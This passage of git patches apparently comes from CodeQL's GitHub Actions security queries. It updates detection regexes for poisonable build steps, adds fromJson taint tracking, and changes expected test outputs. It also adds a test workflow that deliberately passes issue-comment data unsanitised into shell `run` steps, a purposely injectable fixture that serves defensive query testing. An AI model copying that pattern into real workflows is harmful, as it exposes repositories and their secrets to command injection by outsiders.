checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) +select checkout, "Potential execution of untrusted code on a privileged workflow." diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4f1173bd9adc..d4f97a32ec6a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.9 +version: 0.1.10 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index e3a42b3265d8..01045ddde5e1 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -1,2 +1,25 @@ -| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | -| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +edges +| .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:30:9:34:6 | Uses Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:34:9:37:6 | Run Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:15:9:30:6 | Uses Step: issue | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:34:9:37:6 | Run Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:30:9:34:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | +| .github/workflows/comment.yml:34:9:37:6 | Run Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | +| .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +#select +| .github/workflows/comment.yml:41:9:41:43 | Run Step | .github/workflows/comment.yml:37:9:41:6 | Uses Step | .github/workflows/comment.yml:41:9:41:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | +| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | +| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 5f4ba7a7b98f..87289c178af7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -312,15 +312,15 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 9015e85b3d03..3619941aa12e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,21 +1,20 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 45d51a4d00996bec8af9cd8f2cd12891856afa59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:29:53 +0200 Subject: [PATCH 371/707] Add more poisonable steps --- .../codeql/actions/security/PoisonableSteps.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 15 +++++++++------ 2 files changed, 10 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 4165df17a4d8..c228965736da 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) + cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index dc835e7dab21..f13a2a16d359 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -35,6 +35,9 @@ extensions: - ["npm i(nstall)?"] - ["npm run"] - ["npm ci"] + - ["pnpm i(nstall)?"] + - ["pnpm run"] + - ["pnpm ci"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] @@ -54,10 +57,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] + - ["(python)\\s+(.*)\\.py", 3] + - ["(ruby)\\s+(.*)\\.rb", 3] + - ["(go)\\s+(.*)\\.go", 3] From 4b01cd5be45dc8ebb161e7e55ec4e4ef7b8172c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:51:19 +0200 Subject: [PATCH 372/707] Support flow through fromJson --- ql/lib/codeql/actions/ast/internal/Ast.qll | 101 +++++++++++++++--- .../CWE-094/.github/workflows/test9.yml | 27 +++++ .../CWE-094/CodeInjectionCritical.expected | 17 +++ .../CWE-094/CodeInjectionMedium.expected | 13 +++ 4 files changed, 141 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9d2a5b382063..c6569367c10e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1194,12 +1194,25 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(expression, _)) or + exists(getAJsonReferenceExpression(expression, _)) + } abstract string getFieldName(); @@ -1236,8 +1249,17 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(secretsCtxRegex()) and + fieldName = expr.regexpCapture(secretsCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } @@ -1255,9 +1277,18 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1287,10 +1318,19 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and - neededJob.getLocation().getFile() = this.getLocation().getFile() + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(needsCtxRegex()) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expr.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + ) } override string getFieldName() { result = fieldName } @@ -1320,9 +1360,18 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1370,8 +1419,17 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } @@ -1396,8 +1454,17 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(matrixCtxRegex()) and + fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) + ) } override string getFieldName() { result = fieldAccess } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml new file mode 100644 index 000000000000..6ed7db83cb2f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -0,0 +1,27 @@ +name: Test + +on: + issue_comment: + +jobs: + parse-issue: + runs-on: ubuntu-latest + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + - run: echo ${{ steps.issue_body_parser_request.outputs.payload }} + approve-or-deny-request: + runs-on: ubuntu-latest + needs: parse-issue + steps: + - run: echo ${{ needs.parse-issue.outputs.payload }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1b98263c16e8..ff378f93af62 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | 